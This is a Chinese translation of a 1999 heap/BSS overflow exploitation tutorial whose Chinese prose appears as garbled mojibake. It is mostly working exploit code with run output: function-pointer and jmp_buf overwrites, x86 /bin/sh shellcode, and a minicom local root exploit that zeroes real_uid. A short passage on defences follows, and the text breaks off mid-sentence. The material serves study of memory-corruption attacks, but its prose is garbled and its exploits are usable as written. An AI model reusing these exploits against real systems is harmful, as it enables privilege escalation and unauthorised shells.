╡┌╢■╓╓╖╜╖¿╡─╙┼╡π╛═╩╟╝≥╡Ñíú╬╥├╟┐╔╥╘║▄┐∞╡├┤╙╣Ñ╗≈│╠╨≥╡─system()╡─╡╪╓╖▓┬│÷╙╨╚⌡╡π│╠ ╨≥╡─system()╡╪╓╖íú╢°╟╥╘┌╘╢│╠╧╡═│╓╨╥▓╩╟╧α═¼╡─ú¿╚τ╣√░µ▒╛ú¼▓┘╫≈╧╡═│║═╙▓╝■╜ß╣╣╢╝╥╗ ╤∙╡─╗░)íú╡┌╥╗╓╓╖╜╖¿╡─╙┼╡π╘┌╙┌╬╥├╟┐╔╥╘└√╙├╫╘╝║╡─shellcode└┤╫÷╚╬╥Γ╡─╩┬ú¼╢°╟╥▓ó▓╗ ╨Φ╥¬┐╝┬╟║»╩²╓╕╒δ╡─╝µ╚▌╬╩╠Γú¼▒╚╚τ▓╗╣▄╩╟char (*funcptr)(int a)╗╣╩╟void (*funcptr) ()ú¼╢╝┐╔╥╘╦│└√╣ñ╫≈ú¿╡┌╥╗╓╓╖╜╖¿╛═▒╪╨δ┐╝┬╟╒Γ╨⌐ú⌐íú╦ⁿ╡─╚▒╡π╛═╩╟▒╪╨δ╥¬╙╨┐╔╓┤╨╨╡─heap /stack. ╧┬├µ╬╥├╟╘┘└┤┐┤╥╗╕÷╙╨╚⌡╡π╡─│╠╨≥: ----------------------------------------------------------------------------- /* * Just the vulnerable program we will exploit. * Compile as: gcc -o vulprog vulprog.c (or change exploit macros) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define ERROR -1 #define BUFSIZE 64 int goodfunc(const char *str); /* ╒²│ú╟Θ┐÷╧┬╥¬▒╗funcptr╓╕╧≥╡─║»╩² */ int main(int argc, char **argv) { static char buf[BUFSIZE]; static int (*funcptr)(const char *str);/* ╒Γ╕÷╛═╩╟╬╥├╟╜½╥¬╓╪╨┤╡─║»╩²╓╕╒δ */ if (argc <= 2) { fprintf(stderr, "Usage: %s <buf> <goodfunc arg>\n", argv[0]); exit(ERROR); } printf("(for 1st exploit) system() = %p\n", system); printf("(for 2nd exploit, stack method) argv[2] = %p\n", argv[2]); printf("(for 2nd exploit, heap offset method) buf = %p\n\n", buf); funcptr = (int (*)(const char *str))goodfunc; printf("before overflow: funcptr points to %p\n", funcptr); memset(buf, 0, sizeof(buf)); /* ╥τ│÷╙╨┐╔─▄╘┌╒Γ└∩╖ó╔·ú¼╒Γ╥▓╩╟║▄│ú╝√╡─╥╗╓╓┤φ╬≤╡─╩╣╙├strncpy╡─└²╫╙ */ strncpy(buf, argv[1], strlen(argv[1])); printf("after overflow: funcptr points to %p\n", funcptr); (void)(*funcptr)(argv[2]); /* ╒²│ú╟Θ┐÷╧┬╜½╡≈╙├goodfunc,▓╬╩²╬¬argv[2] */ return 0; } /* ---------------------------------------------- */ /* This is what funcptr would point to if we didn't overflow it */ int goodfunc(const char *str) { printf("\nHi, I'm a good function. I was passed: %s\n", str); return 0; } ----------------------------------------------------------------------------- ╬╥├╟└┤┐┤┐┤╡┌╥╗╕÷╣Ñ╗≈╡─└²╫╙ú¼╒Γ└∩▓╔╙├╡─╩╟╩╣╙├system()╡─╖╜╖¿ú║ ----------------------------------------------------------------------------- /* * Copyright (C) January 1999, Matt Conover & WSD * * ╤▌╩╛╘┌bss╢╬(╬┤▒╗│⌡╩╝╗»╡─╩²╛▌ú⌐╓╨╕▓╕╟╛▓╠¼║»╩²╓╕╒δ╡─╖╜╖¿íú * * Try in the offset (argv[2]) in the range of 0-20 (10-16 is best) * To compile use: gcc -o exploit1 exploit1.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> /* ╝┘╔Φfuncptr╙δbuf╓«╝Σ╡─╛α└δú¿╢╘╙┌BSS╟°└┤╦╡ú¼╒Γ╕÷╓╡╙ª╕├╛═╩╟buf╡─┤≤╨í */ #define BUFSIZE 64 #define VULPROG "./vulprog" /* ╙╨╚⌡╡π│╠╨≥╡─╬╗╓├ */ #define CMD "/bin/sh" /* ╢¿╥σ╚τ╣√╣Ñ╗≈│╔╣ª║≤╥¬╓┤╨╨╡─├ⁿ┴ε */ #define ERROR -1 int main(int argc, char **argv) { register int i; u_long sysaddr; static char buf[BUFSIZE + sizeof(u_long) + 1] = {0}; if (argc <= 1) { fprintf(stderr, "Usage: %s <offset>\n", argv[0]); fprintf(stderr, "[offset = estimated system() offset]\n\n"); exit(ERROR); } sysaddr = (u_long)&system - atoi(argv[1]); /* ╝╞╦πsystem()╡─╡╪╓╖ */ printf("trying system() at 0x%lx\n", sysaddr); memset(buf, 'A', BUFSIZE); /* ╘┌little endian╧╡═│╓╨ú¼╨Φ╥¬╜½╫╓╜┌╖┤╨≥┼┼┴╨ */ for (i = 0; i < sizeof(sysaddr); i++) buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255; execl(VULPROG, VULPROG, buf, CMD, NULL); return 0; } ----------------------------------------------------------------------------- ╡▒╬╥├╟╘╦╨╨╦ⁿ║≤ú¼╡├╡╜╧┬├µ╡─╜ß╣√ú║ [warning3@testserver vulpkg2]$ ./exploit2 12 Trying system() at 0x80483fc system()'s address = 0x80483fc before overflow: funcptr points to 0x80485fc after overflow: funcptr points to 0x80483fc bash$ ╜╙╧┬└┤╡─└²╫╙╓╨╬╥├╟╙├┴╦stack║═heap╡─╖╜╖¿ú║ ----------------------------------------------------------------------------- /* * Copyright (C) January 1999, Matt Conover & WSD * * ╒Γ╤▌╩╛┴╦╚τ║╬╓╪╨┤╥╗╕÷╛▓╠¼║»╩²╓╕╒δ╩╣╞Σ╓╕╧≥╬╥├╟╠ß╣⌐╡─shellcode. * ╒Γ╓╓╖╜╖¿╥¬╟≤┐╔╓┤╨╨╡─stack╗≥heap * * ╒Γ╕÷│╠╨≥╓╨╙╨┴╜╕÷▓╬╩²:offset║═heap/stack. ╢╘╙┌stack╖╜╖¿└┤╦╡ú¼ * offset╬¬╢╤╒╗╢Ñ╢╦╡╜(╙╨╚⌡╡π│╠╨≥╡─ú⌐argv[2]╡─╛α└δ. * ╢╘╙┌heap╖╜╖¿└┤╦╡ú¼offset╬¬heap╡─╢Ñ╢╦╡╜▒╗╕▓╕╟╡─ú¿╗≥╓╕╢¿╡─ú⌐buffer╓«╝Σ╡─ * ╛α└δíú * * Try values somewhere between 325-345 for argv[] method, and 420-450 * for heap. * * To compile use: gcc -o exploit2 exploit2.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define ERROR -1 #define BUFSIZE 64 /* estimated diff between buf/funcptr */ #define VULPROG "./vulprog" /* where the vulprog is */ char shellcode[] = /* just aleph1's old shellcode (linux x86) */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0" "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; u_long getesp() { __asm__("movl %esp,%eax"); /* ╡├╡╜╡▒╟░╢╤╒╗╢Ñ╢╦╡─╓╡ */ } int main(int argc, char **argv) { register int i; u_long sysaddr; char buf[BUFSIZE + sizeof(u_long) + 1]; if (argc <= 2) { fprintf(stderr, "Usage: %s <offset> <heap | stack>\n", argv[0]); exit(ERROR); } if (strncmp(argv[2], "stack", 5) == 0) /* ╩╣╙├╢╤╒╗╡─╖╜╖¿ */ { printf("Using stack for shellcode (requires exec. stack)\n"); sysaddr = getesp() + atoi(argv[1]); /* ╝╞╦πargv[2]╡─╡╪╓╖ */ printf("Using 0x%lx as our argv[1] address\n\n", sysaddr); memset(buf, 'A', BUFSIZE + sizeof(u_long)); } else /* ╩╣╙├heap╡─╖╜╖¿ */ { printf("Using heap buffer for shellcode " "(requires exec. heap)\n"); /* ╝╞╦π─┐▒Ωbuffer╡─╡╪╓╖(sbrk(0)╙├└┤╡├╡╜heap╡─╢Ñ╢╦╡╪╓╖) */ sysaddr = (u_long)sbrk(0) - atoi(argv[1]); printf("Using 0x%lx as our buffer's address\n\n", sysaddr); /* ╝╞╦π╩╟╖±buf╙δfuncptr╓«╝Σ╡─╛α└δ▓╗╫π╥╘╖┼╧┬╬╥├╟╡─shellcode */ /* ╚τ╣√╒Γ╢╬╛α└δ▒╚╜╧╨í╡─╗░ú¼╞Σ╩╡┐╔╥╘▓╔╙├┴φ═Γ╡─╖╜╖¿└┤╠ε│Σú║ */ /* buf funcptr sysaddr /* [sysaddr|sysaddr|...][sysaddr][shellcode] */ if (BUFSIZE + 4 + 1 < strlen(shellcode)) { fprintf(stderr, "error: buffer is too small for shellcode " "(min. = %d bytes)\n", strlen(shellcode)); exit(ERROR); } strcpy(buf, shellcode); memset(buf + strlen(shellcode), 'A', BUFSIZE - strlen(shellcode) + sizeof(u_long)); } buf[BUFSIZE + sizeof(u_long)] = '\0'; /* reverse byte order (on a little endian system) (ntohl equiv) */ for (i = 0; i < sizeof(sysaddr); i++) buf[BUFSIZE + i] = ((u_long)sysaddr >> (i * 8)) & 255; execl(VULPROG, VULPROG, buf, shellcode, NULL); return 0; } ----------------------------------------------------------------------------- ╧╚└┤┐┤┐┤╙├╢╤╒╗╡─╖╜╖¿ú║ [warning3@testserver vulpkg3]$ ./exploit3 319 stack Using stack for shellcode (requires exec. stack) Using 0xbffffdf7 as our argv[1] address argv[1] = 0xbffffdf7 buf = 0x8049820 before: funcptr = 0x8048500 after: funcptr = 0xbffffdf7 bash$ buf funcptr ╢╤╒╗╟° ╕▓╕╟╟░:[xxxxxx...xxxxxxx][0x08048500] ╡═╓╖ ------------------> ╕▀╓╖ ╕▓╕╟║≤:[AAAAAA...AAAAAAA][0xbffffdf7] [shellcode] | ^ |___________| ╧┬├µ╩╟╙├heap╡─╖╜╖¿: [warning3@testserver vulpkg3]$ ./exploit3 836 heap Using heap buffer for shellcode (requires exec. heap) Using 0x8049820 as our buffer's address argv[1] = 0xbffffdf7 buf = 0x8049820 before: funcptr = 0x8048500 after: funcptr = 0x8049820 bash$ buf funcptr ╕▓╕╟╟░:[xxxxxxxxxxxxxxxx][0x08048500] ╡═╓╖ ------------------> ╕▀╓╖ ╕▓╕╟║≤:[shellcodeAAA...A][0x8049820] ^ |_0x8049820 ┤╙╔╧├µ╡─└²╫╙┐╔╥╘┐┤│÷,╢╘╙┌═¼╥╗╓╓╬╩╠Γ,┐╔╥╘╙╨╝╕╓╓▓╗═¼╡─╣Ñ╗≈╩╓╖¿.╒Γ└∩╬╥├╟┴φ═Γ╘┘╜Θ ╔▄╥╗╓╓└α╨═╡─╣Ñ╗≈.╦ⁿ└√╙├┴╦setjmp║═longjmp║»╩².╒Γ┴╜╕÷║»╩²═¿│ú╙├└┤╘┌╥╗╨⌐╡═╜╫║»╩² ╓╨┤ª└φ╥╗╨⌐┤φ╬≤║═╓╨╢╧.setjmp(jmpbuf)╙├└┤▒ú┤µ╡▒╟░╡─╢╤╒╗╒╗╓í╡╜jmpbuf╓╨,longjmp (jmpbuf,val)╜½┤╙jmpbuf╓╨╗╓╕┤╢╤╒╗╒╗╓í,longjmp╓┤╨╨═Ω║≤,│╠╨≥╝╠╨°┤╙setjmp()╡─╧┬╥╗ ╠⌡╙∩╛Σ┤ª╓┤╨╨,▓ó╜½val╫≈╬¬setjmp()╡─╖╡╗╪╓╡.jmpbuf╓╨▒ú┤µ╙╨╝─┤µ╞≈bx,si,di,bp,sp,pc ,╚τ╣√╬╥├╟─▄╘┌longjmp╓┤╨╨╥╘╟░╕▓╕╟╡⌠jmpbuf,╬╥├╟╛═─▄╓╪╨┤╝─┤µ╞≈pc.╥≥┤╦╡▒longjmp╗╓╕┤ ▒ú┤µ╡─╢╤╒╗╒╗╓í║≤,│╠╨≥╛═┐╔─▄╠°╡╜╬╥├╟╓╕╢¿╡─╡╪╖╜╚Ñ╓┤╨╨.╓┴╙┌╠°╫¬╡╪╓╖,┐╔╥╘╩╟╢╤╒╗╓╨, ╥▓┐╔╥╘╩╟heap╓╨.╧╓╘┌╬╥├╟╥╘x86╧╡═│╬¬└²└┤╛▀╠σ╜Γ╩═╥╗╧┬. (╧┬├µ╡─┤·┬δ╘┌Redhat 6.0 ,2.2.5╧┬▒α╥δ═¿╣².╢╘╙┌╞Σ╦√╡─╧╡═│,╟δ▓╬┐╝setjmp.h└┤╨▐╕─ ╧α╙ª╡─┤·┬δ) ╩╫╧╚╬╥├╟└┤┐┤╥╗╕÷╙╨╚⌡╡π╡─│╠╨≥: ----------------------------------------------------------------------------- /* * This is just a basic vulnerable program to demonstrate * how to overwrite/modify jmp_buf's to modify the course of * execution. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <setjmp.h> #define ERROR -1 #define BUFSIZE 16 static char buf[BUFSIZE]; jmp_buf jmpbuf; /* jmpbuf╩╟╬╥├╟╧δ╥¬╕▓╕╟╡─ */ u_long getesp() { __asm__("movl %esp,%eax"); /* ╡├╡╜╡▒╟░╢╤╒╗╓╕╒δ */ } int main(int argc, char **argv) { u_long diff; if (argc <= 1) { fprintf(stderr, "Usage: %s <string1> <string2>\n"); exit(ERROR); } diff=(u_long)jmpbuf-(u_long)buf; printf("diff=%d\n",diff); printf("[vulprog] argv[2] = %p\n", argv[2]); printf("[vulprog] sp = 0x%lx\n\n", getesp()); if (setjmp(jmpbuf)) /* ╚τ╣√┤≤╙┌0,─╟├┤longjmp()╙ª╕├╥╤╛¡╓┤╨╨═Ω▒╧┴╦.╓▒╜╙╓┤╨╨setjmp╙ª╕├╖╡╗╪1 */ { fprintf(stderr, "error: exploit didn't work\n"); exit(ERROR); } /* ╬╥├╟┤≥╙í│÷╕▓╕╟╟░║≤jmpbuf╓╨▒ú┤µ╡─╝─┤µ╞≈╡─╓╡ */ printf("before:\n"); printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n", jmpbuf->__jmpbuf[JB_BX], jmpbuf->__jmpbuf[JB_SI], jmpbuf->__jmpbuf[JB_DI]); printf("bp = %p, sp = %p, pc = %p\n\n", jmpbuf->__jmpbuf[JB_BP], jmpbuf->__jmpbuf[JB_SP], jmpbuf->__jmpbuf[JB_PC]); strncpy(buf, argv[1], strlen(argv[1])); /* ╒Γ└∩┐╔─▄╡╝╓┬jmpbuf▒╗╕▓╕╟ */ printf("after:\n"); printf("bx = 0x%lx, si = 0x%lx, di = 0x%lx\n", jmpbuf->__jmpbuf[JB_BX], jmpbuf->__jmpbuf[JB_SI], jmpbuf->__jmpbuf[JB_DI]); printf("bp = %p, sp = %p, pc = %p\n\n", jmpbuf->__jmpbuf[JB_BP], jmpbuf->__jmpbuf[JB_SP], jmpbuf->__jmpbuf[JB_PC]); longjmp(jmpbuf, 1); return 0; } ----------------------------------------------------------------------------- ╘┌╔╧├µ╡─│╠╨≥╓╨╬╥├╟┤≥╙í│÷╝─┤µ╞≈╡─╓╡,╩╟╬¬┴╦┐┤╡├╕ⁿ╟σ│■╥╗╨⌐,▓┬▓Γ╞≡└┤╥▓╕ⁿ╚▌╥╫.:-) ╧┬├µ╬╥├╟╕°│÷╣Ñ╗≈│╠╨≥.╦ⁿ└√╙├argv[]┤ó┤µ┤·┬δ,│╠╨≥╨Φ╥¬╠°╡╜env┤ª╓┤╨╨,╨Φ╥¬┐╔╓┤╨╨╢╤╒╗. ----------------------------------------------------------------------------- /* * Copyright (C) January 1999, Matt Conover & w00w00 Security Development * * ╒Γ╕÷│╠╨≥╙├└┤╤▌╩╛═¿╣²╕▓╕╟jmpbuf(setjmp/longjmp)└┤╘┌heap╓╨─ú─Γ╢╤╒╗╥τ│÷╡─╖╜╖¿ * ╬╥├╟╜½╕▓╕╟jmpbuf╓╨▒ú┤µ╡─sp/pc╝─┤µ╞≈╓╡.╡▒longjmp()▒╗╡≈╙├╡─╩▒║≥,╦ⁿ╜½┤╙╒Γ╕÷╡╪ * ╓╖┐¬╩╝╓┤╨╨╧┬╥╗╠⌡╓╕┴ε.╦∙╥╘,╚τ╣√╬╥├╟─▄╜½┤·┬δ┤µ┤ó╘┌╒Γ╕÷╡╪╓╖,─╟╦ⁿ╛═╜½▒╗╓┤╨╨ * * This takes two arguments (offsets): * arg 1 - stack offset (should be about 25-45). * arg 2 - argv offset (should be about 310-330). */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #define ERROR -1 #define BUFSIZE 36 #define VULPROG "./vulprog4" char shellcode[] = /* just aleph1's old shellcode (linux x86) */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0" "\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; u_long getesp() { __asm__("movl %esp,%eax"); /* the return value goes in %eax */ } int main(int argc, char **argv) { int stackaddr, argvaddr; register int index, i, j; char buf[BUFSIZE + 24 + 1]; if (argc <= 1) { fprintf(stderr, "Usage: %s <stack offset> <argv offset>\n", argv[0]); fprintf(stderr, "[stack offset = offset to stack of vulprog\n"); fprintf(stderr, "[argv offset = offset to argv[2]]\n"); exit(ERROR); } stackaddr = getesp() - atoi(argv[1]); argvaddr = getesp() + atoi(argv[2]); printf("trying address 0x%lx for argv[2]\n", argvaddr); printf("trying address 0x%lx for sp\n\n", stackaddr); /* * The second memset() is needed, because otherwise some values * will be (null) and the longjmp() won't do our shellcode. */ memset(buf, 'A', BUFSIZE), memset(buf + BUFSIZE, 0x1, 12); buf[BUFSIZE+24] = '\0'; /* ------------------------------------- */ /* * ╡▒╔Φ╓├pc╓╕╧≥╬╥├╟╡─shellcode╡╪╓╖╩▒,╬╥├╟╗ß╕▓╕╟jmpbuf╓╨╡─ebp/esp, * ╦∙╥╘,╬╥├╟╜½╙├╒²╚╖╡─╓╡╓╪╨┤╦ⁿ├╟. */ for (i = 0; i < sizeof(u_long); i++) /* setup BP */ { index = BUFSIZE + 12 + i; buf[index] = (stackaddr >> (i * 8)) & 255; } /* ----------------------------- */ for (i = 0; i < sizeof(u_long); i++) /* setup SP */ { index = BUFSIZE + 16 + i; buf[index] = (stackaddr >> (i * 8)) & 255; } /* ----------------------------- */ for (i = 0; i < sizeof(u_long); i++) /* setup PC */ { index = BUFSIZE + 20 + i; buf[index] = (argvaddr >> (i * 8)) & 255; } execl(VULPROG, VULPROG, buf, shellcode, NULL); return 0; } ----------------------------------------------------------------------------- ╬╥├╟└┤┐┤╥╗╧┬╓┤╨╨╡─╜ß╣√: [warning3@testserver vulpkg4]$ ./exploit4 20 393 trying address 0xbffffe49 for argv[2] trying address 0xbffffcac for sp diff=36 [vulprog] argv[2] = 0xbffffe49 [vulprog] sp = 0xbffffcac before: bx = 0x401041b4, si = 0xbffffd04, di = 0x3 bp = 0xbffffcb8, sp = 0xbffffcac, pc = 0x80485c9 after: bx = 0x1010101, si = 0x1010101, di = 0x1010101 bp = 0xbffffcac, sp = 0xbffffcac, pc = 0xbffffe49 bash$ ╬╥├╟╥╤╛¡┐┤╡╜ú¼╘┌╒Γ╨⌐└²╫╙╓╨ú¼heap╟°╡─╥τ│÷┐╔╥╘╡╝╓┬║▄┤≤╡─░▓╚½╬╩╠Γíú╢°╘┌╒µ╩╡╡─╗╖╛│ ╓╨ú¼heap╟°╡─├⌠╕╨╩²╛▌╥▓┐╔─▄▒╗╕▓╕╟íú└²╚τú║ ║»╩² ╘¡╥≥ 1. *gets()/*printf(), *scanf() __iob (FILE)╜ß╣╣┤ó┤µ╘┌heap 2. popen() __iob (FILE)╜ß╣╣┤ó┤µ╘┌heap 3. *dir() (readdir, seekdir, ...) DIR ╜ß╣╣ (dir/heap buffers) 4. atexit() ╛▓╠¼/╚½╛╓║»╩²╓╕╒δ 5. strdup() ╘┌heap╟°╢»╠¼╖╓┼Σ╩²╛▌ 7. getenv() ┤ó┤µ╩²╛▌╘┌heap╟° 8. tmpnam() ┤ó┤µ╩²╛▌╘┌heap╟° 9. malloc() ┴┤╓╕╒δ 10. rpc callback ║»╩² ║»╩²╓╕╒δ 11. windows callback ║»╩² ║»╩²╓╕╒δ▒ú┤µ╘┌heap╟° 12. signal handler pointers ║»╩²╓╕╒δ(╫ó╥Γú║unix╘┌─┌║╦╓╨╕·╫┘╒Γ╨⌐╨┼║┼ú¼ in cygnus (gcc for win), ╢°▓╗╩╟╘┌heap╓╨) printf(),fget(),readir(),seekdir()╡╚║»╩²╬¬FILE╜ß╣╣╘┌heap╓╨╖╓┼Σ╡─┐╒╝Σ┐╔╥╘▒╗╓╪╨┤íú atexit()╡─║»╩²╓╕╒δ╜½╘┌│╠╨≥╓╨╢╧╩▒▒╗╡≈╙├íústrdup()╗ß╜½╫╓╖√┤«(╚τ╬─╝■├√ú¼┐┌┴ε╡╚╡╚) ┤ó┤µ╘┌heap╟°íúmalloc()╡─┴┤╓╕╒δ─▄▒╗╙├└┤╖╟╖¿╖├╬╩─┌┤µíúgetenv()╜½╩²╛▌┤ó┤µ╘┌heap╓╨ú¼ ╘╩╨φ╬╥├╟╨▐╕─$HOME╡╚▒Σ┴┐íúsvc/rpc╫ó▓ß║»╩²(librpc,libnsl╡╚╡╚)╜½╗╪╜╨║»╩²╓╕╒δ┤ó┤µ╘┌ heap╓╨. ╧╓╘┌╬╥├╟└┤┐┤╥╗╕÷╒µ╩╡╡─└²╫╙íú░µ▒╛╡═╙┌1.81.1╡─minicom╙╨▓╗╔┘╗║│σ╟°╥τ│÷╡─┬⌐╢┤íú ╞Σ╓╨╥╗╕÷╩╟: case 't': /* Terminal type */ ╥τ│÷ ---> strcpy(termtype, optarg); #ifdef __linux__ /* Bug in older libc's (< 4.5.26 I think) */ if ((s = getenv("TERMCAP")) != NULL && *s != '/') unsetenv("TERMCAP"); #endif termtype╩╟static╨═╡─╩²╫Θú¼╥▓╛═╩╟╘┌BSS╟°íú╧╓╘┌╬╥├╟┐┤┐┤╩╟╖±╒Γ┐Θ─┌┤µ╓╨╙╨╩▓├┤╓╪╥¬ ╡─╢½╬≈íú╘┌minicom.h╓╨ú¼╬╥├╟┐┤╡╜┴╦: EXTERN int real_uid; /* ╒µ╩╡╡─╙├╗ºid */ EXTERN int real_gid; /* ╒µ╩╡╡─╫Θid */ EXTERN int eff_uid; /* ╙╨╨º╡─╙├╗ºid */ EXTERN int eff_gid; /* ╙╨╨º╡─╫Θid */ ╚τ╣√╬╥├╟─▄╣╗╨▐╕─real_uid,─╟╬╥├╟╛═┐╔─▄╗±╡├root╡─╠╪╚¿íú╧╚╚├╬╥├╟┐┤┐┤ ╦ⁿ└δtermtype╙╨╢α╘▒ú¼╬╥├╟╘┌minicom.c╓╨▓σ╚δ╥╗╨╨┤·┬δú║ printf ("real_uid is at: %x\n" "termtype is at: %x\n", &real_uid,termtype); ╩Σ│÷╜ß╣√╚τ╧┬: real_uid is at: 80664b4 termtype is at: 8066480 ║▄║├ú¼real_uid╡─╡╪╓╖▒╚termtype╕▀52╕÷╫╓╜┌.╬╥├╟╓╗╥¬╜½╡┌53,54,55,56╫╓╜┌╕│╬¬0╝┤┐╔. ╡½╫╓╖√┤«╓╨╓╗╙╨╫ε║≤╥╗╕÷╫╓╜┌(╓╒╓╣╖√)▓┼─▄╬¬0ú¼╦∙╥╘╬╥├╟▓╗╡├▓╗╓┤╨╨4┤╬╕▓╕╟íú getopg()┐╔╥╘╓╪╕┤╡─╢┴╚í╥╗╕÷▓╬╩²(╒Γ└∩╩╟ -t),╥≥┤╦╬╥├╟╧╚╚├╦ⁿ╢┴╚ítermtype+55│ñ╡─╫╓ ╖√┤«,╒Γ╜½╩╣realid╡─╫ε║≤╥╗╕÷╫╓╜┌╬¬0íú╚╗║≤╥└┤╬╙├termtype+54,termtype+53,termtyp e+52└┤╕▓╕╟íú╒Γ╤∙╛═╗ß╩╣realid╡─╦─╕÷╫╓╜┌╢╝▒Σ│╔0┴╦íú ---------------------------------------------------------------------------- #include <stdio.h> #include <string.h> #include <unistd.h> #define OFFSET 52 /* if you figure this out, you could try defining it */ //#define UTTY "/dev/ttyp0" char * makestring (int ch, int len) { static char b[500]; int i; for (i=0 ; i<len ; i++) { b[i] = ch; } b[i] = 0; return b; } int main (int argc, char **argv) { char bleh[4][60]; strcpy (bleh[0],makestring(255,OFFSET+3));/* ╬¬┴╦╕▓╕╟termtype+55┤ª╡─╫╓╜┌*/ strcpy (bleh[1],makestring(255,OFFSET+2));/* ╬¬┴╦╕▓╕╟termtype+54┤ª╫╓╜┌*/ strcpy (bleh[2],makestring(255,OFFSET+1));/* ╬¬┴╦╕▓╕╟termtype+53┤ª╫╓╜┌*/ strcpy (bleh[3],makestring(255,OFFSET)); /* ╬¬┴╦╕▓╕╟termtype+52┤ª╫╓╜┌*/ #ifdef UTTY execl ("/usr/bin/minicom","minicom", "-t",bleh[0],"-t",bleh[1], "-t",bleh[2],"-t",bleh[3], "-t","vt100","-s", "-p",UTTY,NULL); #else execl ("/usr/bin/minicom","minicom", "-t",bleh[0],"-t",bleh[1], "-t",bleh[2],"-t",bleh[3], "-t","vt100", "-s",NULL); #endif return 0; } ------------------------------------------------------------------------------- ╦∙╥╘╧╓╘┌real_uid▒Σ│╔┴╦0x00000000 (root) ╬╥├╟┐╔╥╘═¿╣²minicom└┤╓┤╨╨╥╗╕÷root shell.╘┌╓┤╨╨┴╦╔╧╩÷┤·┬δ╥╘║≤ú¼─π╗ß╖ó╧╓minicom ╡─╧╘╩╛▒Σ│╔┬╥╫╓╖√┴╦íú╬╥├╟┐╔╥╘╘┌┴φ╥╗╕÷╓╒╢╦╓╪╨┬╞≡╥╗╕÷minicom,┐┤╥╗╧┬╦ⁿ╡─▓╦╡Ñú¼╤í╘± `Filenames and paths': A - Download directory : /tmp B - Upload directory : C - Script directory : D - Script program : runscript E - Kermit program : /usr/bin/kermit Change which setting? ╬╥├╟╓╗╥¬╜½`E- Kermit program' ╓╨╡─/usr/bin/kermit╕─│╔/bin/bash,╬╥├╟╛═┐╔╥╘╗±╡├ ╥╗╕÷root shell┴╦íú╟╨╗╗╗╪╘¡╧╚╡─╓╒╢╦ú¼╨▐╕─'E'╧εú¼╚╗║≤░┤CTRL+A+K╞⌠╢»kermit, bash# ╒Γ╩╟heap/BSS╥τ│÷╡─╥╗╕÷╩╡└²íú╒Γ╤∙╡─└²╫╙╒²╘┌╓≡╜Ñ╡╪╘÷╝╙ú¼╟░▓╗╛├CERT╣½▓╝╡─wuftp 2. 5.0╡─mapped_path┬⌐╢┤╛═╩╟╥╗╕÷heap╥τ│÷(longjmp/setjmp)╡─╨┬└²╫╙,╙╨╨╦╚ñ╡─┐╔╥╘╫╘╝║ ┐┤╥╗╧┬íú ╦─. ┐╔─▄╡─╜Γ╛÷╖╜╖¿ ~~~~~~~~~~~~~~~~~~ ║▄├≈╧╘,╖└╓╣╗∙╙┌heap╡─╥τ│÷╡─╫ε╝╤╖╜╖¿╛═╩╟▒α╨┤╙┼╨π╡─┤·┬δ!═¼╢╤╒╗╥τ│÷╥╗╤∙,▓ó├╗╙╨╥╗ ╓╓╖╜╖¿─▄╒µ╒²╖└╓╣heap╥τ│÷. ╬╥├╟┐╔╥╘╩╣╙├Richard Jones║═Paul Kelly┐¬╖ó╡─┤°▒▀╜τ╝∞▓Θ╡─gcc/egcs(╦ⁿ╙ª╕├┐╔╥╘╝∞▓Θ ┤≤▓┐╖╓╡─╟▒╘┌╡─╥τ│÷╬╩╠Γ).╒Γ╕÷│╠╨≥┐╔╥╘┤╙Richard Jone╡─╓≈╥│╔╧╧┬╘╪: http://www.annexia.demon.co.uk ╦ⁿ─▄╝∞▓Θ┤≤╢α╩²╙╔╙┌╚╦╬¬╡─╩Φ║÷╢°╡╝╓┬╡─╥τ│÷.└²╚τ: "int array[10]; for (i = 0; i <= 10; i++) array[i] = 1". ╫ó╥Γ: ╢╘╙┌Windows╧╡═│,┐╔╥╘╙├NuMega╡─▒▀╜τ╝∞▓Θ│╠╨≥.╦ⁿ╡─╣ª─▄║═┤°▒▀╜τ╝∞▓Θ╡─gcc └α╦╞. ╬╥├╟╫▄╩╟┐╔╥╘╫÷╥╗╕÷▓╗┐╔╓┤╨╨heap╡─patch(╛═╧δ╟░├µ╦∙╠ß╡╜╡─,┤≤╢α╩²╧╡═│╢╝╙╨╥╗╕÷┐╔╓┤╨╨ ╡─heap).╘┌║═Solar Designer╜╗╗╗╥Γ╝√╥╘║≤,╦√╠ß╡╜▓╗┐╔╓┤╨╨heap╡─╓≈╥¬╬╩╠Γ╩╟┐╔─▄╗ß╙░╧∞ ╡╜▒α╥δ╞≈,╜Γ╩═╞≈╡╚╡╚ ╫ó╥Γ: ╝┤╩╣╥╗╕÷heap▓╗┐╔╓┤╨╨,╥▓▓ó▓╗─▄╜Γ╛÷╥τ│÷╡─╬╩╠Γ.╥≥╬¬╛í╣▄╬╥├╟▓╗─▄╘┌heap╓┤╨╨╓╕┴ε. ╬╥├╟╚╘╚╗┐╔╥╘╕▓╕╟╘┌heap╓╨╡─╩²╛▌.(╛═╧≤╟░├µminicom╡─└²╫╙) ┴φ╥╗╕÷┐╔─▄╡─╖╜╖¿╛═╩╟╫÷╥╗╕÷"HeapGuard",└α╦╞Crispin Cowan╡─StackGuard.╦√├╟╥╤╛¡┐¬ ╖ó┴╦╥╗╕÷╨┬╡─PointGuard,╙├└┤╖└╓╣║»╩²╓╕╒δ╡─╥τ│÷╥╘╝░jmpbuf╡─╥τ│÷,╛▌│╞╛¡╣²┼Σ╓├╥▓┐╔ 